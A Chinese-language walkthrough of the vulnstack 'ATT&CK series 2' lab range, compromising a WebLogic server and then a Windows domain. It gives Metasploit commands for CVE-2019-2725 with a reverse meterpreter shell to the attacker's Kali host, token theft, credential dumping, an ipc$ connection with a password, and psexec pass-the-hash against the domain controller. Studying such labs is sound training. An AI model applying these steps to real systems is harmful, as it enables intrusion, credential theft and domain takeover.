ATTCK实战系列(二)

vlunstack是红日安全团队出品的一个实战环境，具体介绍请访问：漏洞详情

拓扑结构大体如下：

环境搭建

Kali

ip:192.168.111.135

Web

Ip1:192.168.111.80

Ip2:10.10.10.80

os:windows 2008

应用:weblogic 10.3.6 mssql 2008

Ip1:192.168.111.201

Ip2:10.10.10.201

Os:windows7

ip:10.10.10.10

os:windows 2012

应用:AD域

内网:10.10.10.0/24

外网:192.168.111.0/24

从web机开始渗透, 这里需要手动开启服务,在C:

\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行

账号/密码:Administrator/1qaz@WSX

外网信息收集与渗透

外网渗透

先开始nmap扫描一下192.168.111.0/24存活主机

然后对80 主机进行信息收集扫描

通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.

开放139端口就存在samba服务于是判断可能会有/远程命令执行漏洞

开放1433端口就存在mssql服务有可能存在爆破/注入/SA弱口令

开放3389 那就是远程桌面喽

7001端口百度了一下得知是 weblogic服务

一键漏洞扫描检测工具，提供一键poc检测，收录几乎全部weblogic历史漏洞。
https://github.com/rabbitmask/WeblogicScan 原版
https://github.com/dr0op/WeblogicScan 修改版，多一个CVE检测，高亮美化

weblogicScan进行扫描漏洞

然后百度了一下 CVE-2019-2725漏洞

CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞，这个漏洞依旧是根据weblogic的xmldecoder（xml解码器）反序列化漏洞

然后通过msf查看一下漏洞利用脚本

然后进入开始利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块

set target windows 这个模块默认是unix 所以我们的目标是windows 所以改一下即可

Set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.111.135

Set rhosts 192.168.111.80 要攻击目标

run

内网提权

本来想直接提权,但是发现不能提system权限

system权限

方法1.

然后通过显示进程pid 然后用 migrate 进行进程迁移获得system权限

方法2.

还可以通过令牌窃取的方式进行提权

load incognito #加载incognito(伪装)

Getuid #查看当前token

list_tokens -u #列出可用token

impersonate_token "NT AUTHORITY\\SYSTEM" #token窃取，格式为impersonate_token"主机名\\用户名"

rev2self #返回之前的token

然后使用 kiwi 获取 hash 账号密码

然后获得了域里的用户和密码下面使用用户密码进行远程登录

开始第二阶段的信息搜集

Net config workstation #查域信息

得到域信息还有10.10.10.0/24网段

设置一条通往10.10.10.0/24网段的路由

然后设置代理

使用use post/windows/gather/arp_scanner模块

扫描网段存活主机

然后又通过web 进行信息收集了一下

得知 10.10.10.10 就是域控

域成员处理web 还有一个PC机

然后判断PC ip是10.10.10.201

下面渗透pc域用户

方法一

首先用kali生成一个payload

然后通过web机上传到 10.10.10.201c盘

先上传到web里

再控制WEB主机与PC建立一个ipc$连接：

net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator

然后把刚才上传的文件copy到10.10.10.201 c盘

然后再meterpreter中载入powershell模块

在powershell里面执行如下命令，控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马：

然后从新开启一个msf 监听生成的 payload 1520 端口

成功反弹

下面开始提权

方法二

代理nmap扫描10.10.10.201

使用 exploit/windows/smb/psexec模块进行哈希传递

由于一开始再web机得知了域\用户\密码

说以就可以用这个模块直接打了

Set smbdomain DE1AY #域

Set smbuser administrator # 域用户

Set smbpass lbb1111.. #域用户密码

直接system权限

通过扫描得知3389是开哒

然后尝试一下代理远程能不能直接登录

向DC 域控发起进攻

同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递

拿下域控制器并且是system权限